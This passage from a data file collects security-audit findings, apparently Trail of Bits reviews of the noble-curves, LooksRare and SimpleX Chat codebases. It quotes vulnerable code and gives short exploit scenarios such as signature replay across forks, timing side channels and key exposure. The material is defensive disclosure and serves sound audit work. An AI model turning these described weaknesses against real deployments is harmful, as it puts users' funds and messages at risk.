constant time for a given value of . . Timing leakage threats can be reduced by modifying the Tonelli-Shanks code to run in constant time (see here ), and making the constant-time implementation the default square root algorithm. Special-case algorithms can be broken out into separate functions (whether constant- or variable-time), for use when the modulus is known to work, or timing attacks are not a concern. Exploit Scenario An attacker interacts with a user of the library and measures the time it takes to execute signature generation or ECDH key exchange. In the case of static ECDH, the attacker may provide dierent public keys to be multiplied with the static private key of the library user. In the case of ECDSA, the attacker may get the user to repeatedly sign the same message, which results in scalar multiplications on the base point using the same deterministically generated nonce. The attacker can subsequently average the obtained execution times for operations with the same input to gain more precise timing estimates. Then, the attacker uses the obtained execution times to mount a timing attack: 15 noble-curves Security Assessment In the case of ECDSA, the attacker may attempt to mount the attack from the TCHES 2019 article by Ryan . However, it is unknown whether this attack will work in practice when based purely on timing. In the case of static ECDH, the attacker may attempt to mount a recursive attack, similar to the attacks described in the Cardis 1998 article by Dhem et al. or the JoCE 2013 article by Danger et al. Note that the timing dierences caused by the precomputed point look-up may not be sucient to mount such a timing attack. The attacker would need to nd other timing dierences, such as dierences in the point addition routines based on one of the input points. The fact that the library uses a complete addition formula increases the diculty, but there could still be timing dierences caused by the underlying big integer arithmetic. Determining whether such timing attacks are practically applicable to the library (and how many executions they would need) requires a large number of measurements on a dedicated benchmarking system, which was not done as part of this engagement. Recommendations Short term, consider adding scalar randomization to primitives where the same private scalar can be used multiple times, such as ECDH and deterministic ECDSA. To mitigate the attack from the TCHES 2019 article by Ryan , consider either blinding the private scalar in the signature computation or removing the modular reduction of = ( * ( + * )) , i.e., . Long term, ensure that all low-level operations are constant-time. References Return of the Hidden Number Problem, Ryan, TCHES 2019 A Practical Implementation of the Timing Attack, Dhem et al., Cardis 1998 A synthesis of side-channel attacks on elliptic curve cryptography in smart-cards, Danger et al., JoCE 2013 16 noble-curves Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "1. Risk of reuse of signatures across forks due to lack of chainID validation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "At construction, the LooksRareExchange contract computes the domain separator using the networks chainID , which is xed at the time of deployment. In the event of a post-deployment chain fork, the chainID cannot be updated, and the signatures may be replayed across both versions of the chain. constructor ( address _currencyManager , address _executionManager , address _royaltyFeeManager , address _WETH , address _protocolFeeRecipient ) { // Calculate the domain separator DOMAIN_SEPARATOR = keccak256 ( abi.encode( 0x8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f , // keccak256(\"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\") 0xda9101ba92939daf4bb2e18cd5f942363b9297fbc3232c9dd964abb1fb70ed71 , // keccak256(\"LooksRareExchange\") 0xc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc6 , // keccak256(bytes(\"1\")) for versionId = 1 block.chainid , address ( this ) ) ); currencyManager = ICurrencyManager(_currencyManager); executionManager = IExecutionManager(_executionManager); royaltyFeeManager = IRoyaltyFeeManager(_royaltyFeeManager); WETH = _WETH; protocolFeeRecipient = _protocolFeeRecipient; Figure 1.1: contracts/contracts/LooksRareExchange.sol#L137-L145 The _validateOrder function in the LooksRareExchange contract uses a SignatureChecker function, verify , to check the validity of a signature: // Verify the validity of the signature require ( SignatureChecker.verify( orderHash, makerOrder.signer, makerOrder.v, makerOrder.r, makerOrder.s, DOMAIN_SEPARATOR ), \"Signature: Invalid\" ); Figure 1.2: contracts/contracts/LooksRareExchange.sol#L576-L587 However, the verify function checks only that a user has signed the domainSeparator . As a result, in the event of a hard fork, an attacker could reuse signatures to receive user funds on both chains. To mitigate this risk, if a change in the chainID is detected, the domain separator can be cached and regenerated. Alternatively, instead of regenerating the entire domain separator, the chainID can be included in the schema of the signature passed to the order hash. /** * @notice Returns whether the signer matches the signed message * @param hash the hash containing the signed mesage * @param signer the signer address to confirm message validity * @param v parameter (27 or 28) * @param r parameter * @param s parameter * @param domainSeparator paramer to prevent signature being executed in other chains and environments * @return true --> if valid // false --> if invalid */ function verify ( bytes32 hash , address signer , uint8 v , bytes32 r , bytes32 s , bytes32 domainSeparator ) internal view returns ( bool ) { // \\x19\\x01 is the standardized encoding prefix // https://eips.ethereum.org/EIPS/eip-712#specification bytes32 digest = keccak256 (abi.encodePacked( \"\\x19\\x01\" , domainSeparator, hash )); if (Address.isContract(signer)) { // 0x1626ba7e is the interfaceId for signature contracts (see IERC1271) return IERC1271(signer).isValidSignature(digest, abi.encodePacked(r, s, v)) == 0x1626ba7e ; } else { return recover(digest, v, r, s) == signer; } } Figure 1.3: contracts/contracts/libraries/SignatureChecker.sol#L41-L68 The signature schema does not account for the contracts chain. If a fork of Ethereum is made after the contracts creation, every signature will be usable in both forks. Exploit Scenario Bob signs a maker order on the Ethereum mainnet. He signs the domain separator with a signature to sell an NFT. Later, Ethereum is hard-forked and retains the same chain ID. As a result, there are two parallel chains with the same chain ID, and Eve can use Bobs signature to match orders on the forked chain. Recommendations Short term, to prevent post-deployment forks from aecting signatures, add the chain ID opcode to the signature schema. Long term, identify and document the risks associated with having forks of multiple chains and develop related mitigation strategies.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Lack of two-step process for contract ownership changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The owner of a LooksRare protocol contract can be changed by calling the transferOwnership function in OpenZeppelins Ownable contract. This function internally calls the _transferOwnership function, which immediately sets the contracts new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _transferOwnership( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership ( address newOwner ) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 2.1: OpenZeppelins Ownable contract Exploit Scenario Alice and Bob invoke the transferOwnership() function on the LooksRare multisig wallet to change the address of an existing contracts owner. They accidentally enter the wrong address, and ownership of the contract is transferred to the incorrect address. As a result, access to the contract is permanently revoked. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts ( appendix E ) and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "3. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identied a dependency with a known vulnerability. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details the high severity issue: CVE ID", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "4. Users that create ask orders cannot modify minPercentageToAsk ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "Users who sell their NFTs on LooksRare are unable to protect their orders against arbitrary changes in royalty fees set by NFT collection owners; as a result, users may receive less of a sales value than expected. Ideally, when a user lists an NFT, he should be able to set a threshold at which the transaction will execute based on the amount of the sales value that he will receive. This threshold is set via the minPercentageToAsk variable in the MakerOrder and TakerOrder structs. The minPercentageToAsk variable protects users who create ask orders from excessive royalty fees. When funds from an order are transferred, the LooksRareExchange contract ensures that the percentage amount that needs to be transferred to the recipient is greater than or equal to minPercentageToAsk (gure 3.1). function _transferFeesAndFunds ( address strategy , address collection , uint256 tokenId , address currency , address from , address to , uint256 amount , uint256 minPercentageToAsk ) internal { // Initialize the final amount that is transferred to seller uint256 finalSellerAmount = amount; // 1. Protocol fee { uint256 protocolFeeAmount = _calculateProtocolFee(strategy, amount); [...] finalSellerAmount -= protocolFeeAmount; } } // 2. Royalty fee { ( address royaltyFeeRecipient , uint256 royaltyFeeAmount ) = royaltyFeeManager.calculateRoyaltyFeeAndGetRecipient( collection, tokenId, amount ); // Check if there is a royalty fee and that it is different to 0 [...] finalSellerAmount -= royaltyFeeAmount; [...] require ( (finalSellerAmount * 10000 ) >= (minPercentageToAsk * amount), \"Fees: Higher than expected\" ); [...] } Figure 4.1: The _transferFeesAndFunds function in LooksRareExchange :422-466 However, users creating ask orders cannot modify minPercentageToAsk . By default, the minPercentageToAsk of orders placed through the LooksRare platform is set to 85%. In cases in which there is no royalty fee and the protocol fee is 2%, minPercentageToAsk could be set to 98%. Exploit Scenario Alice lists an NFT for sale on LooksRare. The protocol fee is 2%, minPercentageToAsk is 85%, and there is no royalty fee. The NFT project grows in popularity, which motivates Eve, the owner of the NFT collection, to raise the royalty fee to 9.5%, the maximum fee allowed by the RoyaltyFeeRegistry contract. Bob purchases Alices NFT. Alice receives 89.5% of the sale even though she could have received 98% of the sale at the time of the listing. Recommendations Short term, set minPercentageToAsk to 100% minus the sum of the protocol fee and the max value for a royalty fee, which is 9.5%. Long term, identify and validate the bounds for all parameters and variables in the smart contract system.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "5. Excessive privileges of RoyaltyFeeSetter and RoyaltyFeeRegistry owners ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The RoyaltyFeeSetter and RoyaltyFeeRegistry contract owners can manipulate an NFT collections royalty information, such as the fee percentage and the fee receiver; this violates the principle of least privilege. NFT collection owners can use the RoyaltyFeeSetter contract to set the royalty information for their NFT collections. This information is stored in the RoyaltyFeeRegistry contract. However, the owners of the two contracts can also update this information (gures 5.1 and 5.2). function updateRoyaltyInfoForCollection ( address collection , address setter , address receiver , uint256 fee ) external override onlyOwner { require (fee <= royaltyFeeLimit, \"Registry: Royalty fee too high\" ); _royaltyFeeInfoCollection[collection] = FeeInfo({ setter: setter, receiver: receiver, fee: fee }); emit RoyaltyFeeUpdate(collection, setter, receiver, fee); } Figure 5.1: The updateRoyaltyInfoForCollection function in RoyaltyFeeRegistry :54- function updateRoyaltyInfoForCollection ( address collection , address setter , address receiver , uint256 fee ) external onlyOwner { IRoyaltyFeeRegistry(royaltyFeeRegistry).updateRoyaltyInfoForCollection( collection, setter, receiver, fee ); } Figure 5.2: The updateRoyaltyInfoForCollection function in RoyaltyFeeSetter :102-109 This violates the principle of least privilege. Since it is the responsibility of the NFT collections owner to set the royalty information, it is unnecessary for contract owners to have the same ability. Exploit Scenario Alice, the owner of the RoyaltyFeeSetter contract, sets the incorrect receiver address when updating the royalty information for Bobs NFT collection. Bob is now unable to receive fees from his NFT collections secondary sales. Recommendations Short term, remove the ability for users to update an NFT collections royalty information. Long term, clearly document the responsibilities and levels of access provided to privileged users of the system. 6. Insu\u0000cient protection of sensitive information Severity: Low Diculty: High Type: Conguration Finding ID: TOB-LR-6 Target: contracts/hardhat.config.ts", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "7. Contracts used as dependencies do not track upstream changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare codebase uses a third-party contract, SignatureChecker , but the LooksRare documentation does not specify which version of the contract is used or whether it was modied. This indicates that the LooksRare protocol does not track upstream changes in contracts used as dependencies. Therefore, the LooksRare contracts may not reliably reect updates or security xes implemented in their dependencies, as those updates must be manually integrated into the contracts. Exploit Scenario A third-party contract used in LooksRare receives an update with a critical x for a vulnerability, but the update is not manually integrated in the LooksRare version of the contract. An attacker detects the use of a vulnerable contract in the LooksRare protocol and exploits the vulnerability against one of the contracts. Recommendations Short term, review the codebase and document the source and version of each dependency. Include third-party sources as submodules in the projects Git repository to maintain internal path consistency and ensure that dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "8. Missing event for a critical operation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The system does not emit an event when a protocol fee is levied in the _transferFeesAndFunds and _transferFeesAndFundsWithWETH functions. Operations that transfer value or perform critical operations should trigger events so that users and o-chain monitoring tools can account for important state changes. if ((protocolFeeRecipient != address (0)) && (protocolFeeAmount != 0)) { IERC20(currency).safeTransferFrom(from, protocolFeeRecipient, protocolFeeAmount); finalSellerAmount -= protocolFeeAmount; } Figure 8.1: Protocol fee transfer in _transferFeesAndFunds function ( contracts/executionStrategies/StrategyDutchAuction.sol#L440-L443 ) Exploit Scenario A smart contract wallet provider has a LooksRare integration that enables its users to buy and sell NFTs. The front end relies on information from LooksRares subgraph to itemize prices, royalties, and fees. Because the system does not emit an event when a protocol fee is incurred, an under-calculation in the wallet providers accounting leads its users to believe they have been overcharged. Recommendations Short term, add events for all critical operations that transfer value, such as when a protocol fee is assessed. Events are vital aids in monitoring contracts and detecting suspicious behavior. Long term, consider adding or accounting for a new protocol fee event in the LooksRare subgraph and any other o-chain monitoring tools LooksRare might be using.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "9. Taker orders are not EIP-712 signatures ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "When takers attempt to match order proposals, they are presented with an obscure blob of data. In contrast, makers are presented with a formatted data structure that makes it easier to validate transactions. struct TakerOrder { bool isOrderAsk ; // true --> ask / false --> bid address taker ; // msg.sender uint256 price ; // final price for the purchase uint256 tokenId ; uint256 minPercentageToAsk ; // // slippage protection (9000 --> 90% of the final price must return to ask) bytes params ; // other params (e.g., tokenId) } Figure 9.1: The TakerOrder struct in OrderTypes.sol :31-38 While this issue cannot be exploited directly, it creates an asymmetry between the user experience (UX) of makers and takers. Because of this, users depend on the information that the user interface (UI) displays to them and are limited by the UX of the wallet software they are using. Exploit Scenario 1 Eve, a malicious user, lists a new collection with the same metadata as another, more popular collection. Bob sees Eves listing and thinks that it is the legitimate collection. He creates an order for an NFT in Eves collection, and because he cannot distinguish the parameters of the transaction he is signing, he matches it, losing money in the process. Exploit Scenario 2 Alice, an attacker, compromises the UI, allowing her to manipulate the information displayed by it in order to make illegitimate collections look legitimate. This is a more extreme exploit scenario. Recommendations Short term, evaluate and document the current UI and the pitfalls that users might encounter when matching and creating orders. Long term, evaluate whether adding support for EIP-712 signatures in TakerOrder would minimize the issue and provide a better UX.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "10. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the LooksRare contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "11. isContract may behave unexpectedly ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare exchange relies on OpenZeppelins SignatureChecker library to verify signatures on-chain. This library, in turn, relies on the isContract function in the Address library to determine whether the signer is a contract or an externally owned account (EOA). However, in Solidity, there is no reliable way to denitively determine whether a given address is a contract, as there are several edge cases in which the underlying extcodesize function can return unexpected results. function isContract( address account) internal view returns ( bool ) { // This method relies on extcodesize, which returns 0 for contracts in // construction, since the code is only stored at the end of the // constructor execution. uint256 size; assembly { size := extcodesize (account) } return size > 0; } Figure 11.1: The isContract function in Address.sol #L27-37 Exploit Scenario A maker order is created and signed by a smart contract wallet. While this order is waiting to be lled, selfdestruct is called on the contract. The call to extcodesize returns 0, causing isContract to return false. Even though the order was signed by an ERC1271-compatible contract, the verify method will attempt to validate the signers address as though it were signed by an EOA. Recommendations Short term, clearly document for developers that SignatureChecker.verify is not guaranteed to accurately distinguish between an EOA and a contract signer, and emphasize that it should never be used in a manner that requires such a guarantee. Long term, avoid adding or altering functionality that would rely on a guarantee that a signatures source remains consistent over time.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "12. tokenId and amount fully controlled by the order strategy when matching two orders ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "When two orders are matched, the strategy dened by the MakerOrder is called to check whether the order can be executed. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...] // Retrieve execution parameters ( bool isExecutionValid , uint256 tokenId , uint256 amount ) = IExecutionStrategy(makerAsk.strategy) .canExecuteTakerBid(takerBid, makerAsk); require (isExecutionValid, \"Strategy: Execution invalid\" ); [...] } Figure 12.1: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#186-212 ) The strategy call returns a boolean indicating whether the order match can be executed, the tokenId to be sold, and the amount to be transferred. The LooksRareExchange contract does not verify these last two values, which means that the strategy has full control over them. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...] // Execution part 1/2 _transferFeesAndFundsWithWETH( makerAsk.strategy, makerAsk.collection, tokenId, makerAsk.signer, takerBid.price, makerAsk.minPercentageToAsk ); // Execution part 2/2 _transferNonFungibleToken(makerAsk.collection, makerAsk.signer, takerBid.taker, tokenId, amount); emit TakerBid( askHash, makerAsk.nonce, takerBid.taker, makerAsk.signer, makerAsk.strategy, makerAsk.currency, makerAsk.collection, tokenId, amount, takerBid.price ); } Figure 12.2: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#217-228 ) This ultimately means that a faulty or malicious strategy can cause a loss of funds (e.g., by returning a dierent tokenId from the one that was intended to be sold or bought). Additionally, this issue may become problematic if strategies become trustless and are no longer developed or allowlisted by the LooksRare team. Exploit Scenario A faulty strategy, which returns a dierent tokenId than expected, is allowlisted in the protocol. Alice creates a new order using that strategy to sell one of her tokens. Bob matches Alices order, but because the tokenId is not validated before executing the order, he gets a dierent token than he intended to buy. Recommendations Short term, evaluate and document this behavior and use this documentation when integrating new strategies into the protocol. Long term, consider adding further safeguards to the LooksRareExchange contract to check the validity of the tokenId and the amount returned by the call to the strategy.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "13. Risk of phishing due to data stored in maker order params eld ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The MakerOrder struct contains a params eld, which holds arbitrary data for each strategy. This storage of data may increase the chance that users could be phished. struct MakerOrder { bool isOrderAsk; // true --> ask / false --> bid address signer; // signer of the maker order address collection; // collection address uint256 price; // price (used as ) uint256 tokenId; // id of the token uint256 amount; // amount of tokens to sell/purchase (must be 1 for ERC721, 1+ for ERC1155) address strategy; // strategy for trade execution (e.g., DutchAuction, StandardSaleForFixedPrice) address currency; // currency (e.g., WETH) uint256 nonce; // order nonce (must be unique unless new maker order is meant to override existing one e.g., lower ask price) uint256 startTime; // startTime in timestamp uint256 endTime; // endTime in timestamp uint256 minPercentageToAsk; // slippage protection (9000 --> 90% of the final price must return to ask) bytes params; // additional parameters uint8 v; // v: parameter (27 or 28) bytes32 r; // r: parameter bytes32 s; // s: parameter } Figure 13.1: The MakerOrder struct in contracts/libraries/OrderTypes.sol#L12-29 In the Dutch auction strategy, the maker params eld denes the start price for the auction. When a user generates the signature, the UI must specify the purpose of params . function canExecuteTakerBid (OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { } uint256 startPrice = abi.decode(makerAsk.params, ( uint256 )); uint256 endPrice = makerAsk.price; Figure 13.2: The canExecuteTakerBid function in contracts/executionStrategies/StrategyDutchAuction.sol#L39-L70 When used in a StrategyPrivateSale transaction, the params eld holds the buyer address that the private sale is intended for. function canExecuteTakerBid(OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { // Retrieve target buyer address targetBuyer = abi.decode(makerAsk.params, ( address )); return ( ((targetBuyer == takerBid.taker) && (makerAsk.price == takerBid.price) && (makerAsk.tokenId == takerBid.tokenId) && (makerAsk.startTime <= block.timestamp ) && (makerAsk.endTime >= block.timestamp )), makerAsk.tokenId, makerAsk.amount ); } Figure 13.3: The canExecuteTakerBid function in contracts/executionStrategies/StrategyPrivateSale.sol Exploit Scenario Alice receives an EIP-712 signature request through MetaMask. Because the value is masked in the params eld, Alice accidentally signs an incorrect parameter that allows an attacker to match. Recommendations Short term, document the expected values for the params value for all strategies and add in-code documentation to ensure that developers are aware of strategy expectations. Long term, document the risks associated with o-chain signatures and always ensure that users are aware of the risks of signing arbitrary data.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "14. Use of legacy openssl version in solidity-coverage plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare codebase uses a version of solidity-coverage that relies on a legacy version of openssl to run. While this plugin does not alter protocol contracts deployed to production, the use of outdated security protocols anywhere in the codebase may be risky or prone to errors. Error in plugin solidity-coverage: Error: error:0308010C:digital envelope routines::unsupported Figure 14.1: Error raised by npx hardhat coverage Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "15. TypeScript compiler errors during deployment ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "TypeScript throws an error while trying to compile scripts during the deployment process. scripts/helpers/deploy-exchange.ts:29:5 - error TS7053: Element implicitly has an 'any' type because expression of type 'string' can't be used to index type '{ mainnet: string; rinkeby: string; localhost: string; }'. No index signature with a parameter of type 'string' was found on type '{ mainnet: string; rinkeby: string; localhost: string; }'. 29 config.Fee.Standard[activeNetwork] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Figure 15.1: TypeScript error raised by npx hardhat run --network localhost scripts/hardhat/deploy-hardhat.ts In the config.ts le, the config object does not explicitly allow string types to be used as an index type for accessing its keys. Hardhat assigns a string type as the value of activeNetwork . As a result, TypeScript throws a compiler error when it tries to access a member of the config object using the activeNetwork value. Recommendations Short term, add type information to the config object that allows its keys to be accessed using string types. Long term, ensure that TypeScript can compile properly without errors in any and every potential context.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "1. X3DH does not apply HKDF to generate secrets ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The extended triple Die-Hellman (X3DH) key agreement protocol works by computing three separate Die-Hellman computations between pairs of keys. In particular, each party has a longer term private and public key pair as well as a more short-term private and public key pair. The three separate Die-Hellman computations are performed between the various pairs of long term and short term keys. The key agreement is performed this way to simultaneously authenticate each party and provide forward secrecy, which limits the impact of compromised keys. When performing the X3DH key agreement, the nal shared secret is formed by applying HKDF to the concatenation of all three Die-Hellman outputs. The computation is performed this way so that the shared secret depends on the entropy of all three Die-Hellman computations. If the X3DH protocol is being used to generate multiple shared secrets (which is the case for SimpleX), then these secrets should be formed by computing the HKDF over all three Die-Hellman outputs and then splitting the output of HKDF into separate shared secrets. However, as shown in Figure 1.1, the SimpleX implementation of X3DH uses each of the three Die-Hellman outputs as separate secrets for the Double Ratchet protocol, rather than inputting them into HKDF and splitting the output. x3dhSnd :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhSnd spk1 spk2 ( E2ERatchetParams _ rk1 rk2) = x3dh (publicKey spk1, rk1) (dh' rk1 spk2) (dh' rk2 spk1) (dh' rk2 spk2) x3dhRcv :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhRcv rpk1 rpk2 ( E2ERatchetParams _ sk1 sk2) = x3dh (sk1, publicKey rpk1) (dh' sk2 rpk1) (dh' sk1 rpk2) (dh' sk2 rpk2) x3dh :: DhAlgorithm a => ( PublicKey a, PublicKey a) -> DhSecret a -> DhSecret a -> DhSecret a -> RatchetInitParams x3dh (sk1, rk1) dh1 dh2 dh3 = RatchetInitParams {assocData, ratchetKey = RatchetKey sk, sndHK = Key hk, rcvNextHK = Key nhk} where assocData = Str $ pubKeyBytes sk1 <> pubKeyBytes rk1 (hk, rest) = B .splitAt 32 $ dhBytes' dh1 <> dhBytes' dh2 <> dhBytes' dh3 (nhk, sk) = B .splitAt 32 rest Figure 1.1: simplexmq/src/Simplex/Messaging/Crypto/Ratchet.hs#L98-L112 Performing the X3DH protocol this way will increase the impact of compromised keys and have implications for the theoretical forward secrecy of the protocol. To see why this is the case, consider what happens if a single key pair, (sk2 , spk2) , is compromised. In the current implementation, if an attacker compromises this key pair, then they can immediately recover the header key, hk , and the ratchet key, sk . However, if this were implemented by rst computing the HKDF over all three Die-Hellman outputs, then the attacker would not be able to recover these keys without also compromising another key pair. Note that SimpleX does not perform X3DH with long-term identity keys, as the SimpleX protocol does not rely on long-term keys to identify client devices. Therefore, the impact of compromising a key will be less severe, as it will aect only the secrets of the current session. Exploit Scenario An attacker is able to compromise a single X3DH key pair of a client using SimpleX chat. Because of how the X3DH is performed, they are able to then compromise the clients header key and ratchet key and can decrypt some of their messages. Recommendations Short term, adjust the X3DH implementation so that HKDF is computed over the concatenation of dh1 , dh2 , and dh3 before obtaining the ratchet key and header keys.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "2. The pad function is incorrect for long messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The pad function from the Simplex.Messaging.Crypto module uses the fromIntegral function, resulting in an integer overow bug that leads to incorrect length encoding for messages longer than 65535 bytes (Figure 2.1). At the moment, the function appears to be called only with messages that are less than that; however, due to the general nature of the module, there is a risk of using a pad with longer messages as the message length assumption is not documented. pad :: ByteString -> Int -> Either CryptoError ByteString pad msg paddedLen | padLen >= 0 = Right $ encodeWord16 (fromIntegral len) <> msg <> B .replicate padLen '#' | otherwise = Left CryptoLargeMsgError where len = B .length msg padLen = paddedLen - len - 2 Figure 2.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L805-L811 Exploit Scenario The pad function is used on messages longer than 65535 bytes, introducing a security vulnerability. Recommendations Short term, change the pad function to check the message length if it ts into 16 bits and return CryptoLargeMsgError if it does not. Long term, write unit tests for the pad function. Avoid using fromIntegral to cast to smaller integer types; instead, create a new function that will safely cast to smaller types that returns Maybe .", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. The unPad function throws exception for short messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The unPad function throws an undocumented exception when the input is empty or a single byte. This is due to the decodeWord16 function, which throws an IOException if the input is not exactly two bytes. The unPad function does not appear to be used on such short inputs in the current code. unPad :: ByteString -> Either CryptoError ByteString unPad padded | B .length rest >= len = Right $ B .take len rest | otherwise = Left CryptoLargeMsgError where ( lenWrd , rest) = B .splitAt 2 padded len = fromIntegral $ decodeWord16 lenWrd Figure 3.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L813-L819 Exploit Scenario The unPad function takes a user-controlled input and throws an exception that is not handled in a thread that is critical to the functioning of the protocol, resulting in a denial of service. Recommendations Short term, validate the length of the input passed to the unPad function and return an error if the input is too short. Long term, write unit tests for the unPad function to ensure the validation works as intended.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "4. Key material resides in unpinned memory and is not cleared after its lifetime ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The key material generated and processed by the SimpleXMQ library resides in unpinned memory, and the data is not cleared out from the memory as soon as it is no longer used. The key material will stay on the Haskell heap until it is garbage collected and overwritten by other data. Combined with unpinned memory pages where the Haskells heap is allocated, this creates a risk of paging out unencrypted memory pages with the key material to disk. Because the memory management is abstracted away by the language, the manual memory management required to pin and zero-out the memory in garbage-collected language as Haskell is challenging. This issue does not concern the communication security; only device security is aected. Exploit Scenario The unencrypted key material is paged out to the hard drive, where it is exposed and can be stolen by an 